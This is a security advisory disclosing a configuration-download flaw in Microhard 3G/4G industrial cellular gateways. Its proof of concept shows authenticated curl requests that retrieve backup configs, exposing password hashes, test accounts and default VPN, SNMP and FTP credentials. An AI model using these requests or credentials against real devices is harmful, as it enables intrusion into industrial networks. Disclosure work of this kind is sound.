1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144 | Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective
name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'
and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain
circumstances. This will enable the attacker to disclose sensitive information and help her
in authentication bypass, privilege escalation and/or full system access.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5484
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php
13.03.2018
--
/etc/m_cli/cli.conf:
--------------------
curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf" -H "Authorization: Basic YWRtaW46YWRtaW4=" |grep passwd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2719 100 2719 0 0 2574 0 0:00:01 0:00:01 --:--:-- 2577
passwd admin
/www/IPn4G.config:
------------------
lqwrm@metalgear:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H "Authorization: Basic YWRtaW46YWRtaW4="
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13156 100 13156 0 0 9510 0 0:00:01 0:00:01 --:--:-- 9512
lqwrm@metalgear:~$ tar -zxf IPn4G.tar.gz ; ls
config.boardinfo config.boardtype config.date config.name etc IPn4G.tar.gz usr
lqwrm@metalgear:~$ cat config.boardinfo config.boardtype config.date config.name
2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0
Atheros AR7130 rev 2
Thu Jul 12 12:42:42 PDT 2018
IPn4G
lqwrm@metalgear:~$ cat usr/lib/hardware_desc
modem_type="N930"
LTE_ATCOMMAND_PORT="/dev/ttyACM0"
LTE_DIAG_PORT=""
LTE_GPS_PORT=""
wificard = "0"
lqwrm@metalgear:~$ ls etc/
config crontabs dropbear ethers firewall.user hosts httpd.conf passwd ssl
lqwrm@metalgear:~$ ls etc/config/
comport dhcp gpsgatetr iperf modbusd notes sdpServer twatchdog webif_access_control
comport2 dropbear gpsr ipsec msmscomd ntpclient snmpd updatedd websockserver
coova-chilli ethernet gpsrecorderd keepalive msshc ntrd snmpd.conf vlan wireless
cron eurd gre-tunnels localmonitor network pimd system vnstat wsclient
crontabs firewall httpd lte network_IPnVTn3G ping timezone vpnc
datausemonitor gpsd ioports lte362 network_VIP4G salertd tmpstatus webif
lqwrm@metalgear:~$ cat etc/passwd
root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
nobody:*:65534:65534:nobody:/var:/bin/false
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
/www/cgi-bin/system.conf:
-------------------------
lqwrm@metalgear:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H "Authorization: Basic YWRtaW46YWRtaW4="
lqwrm@metalgear:~$ cat system.conf |grep -irnH "password" -A2
system.conf:236:#VPN Admin Password:
system.conf-237-NetWork_IP_VPN_Passwd=admin
system.conf-238-
--
system.conf:309:#V3 Authentication Password:
system.conf:310:NetWork_SNMP_V3_Auth_Password=00000000
system.conf-311-
system.conf:312:#V3 Privacy Password:
system.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000
Login to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.
---------------------------------------------------------------------------------------------
|
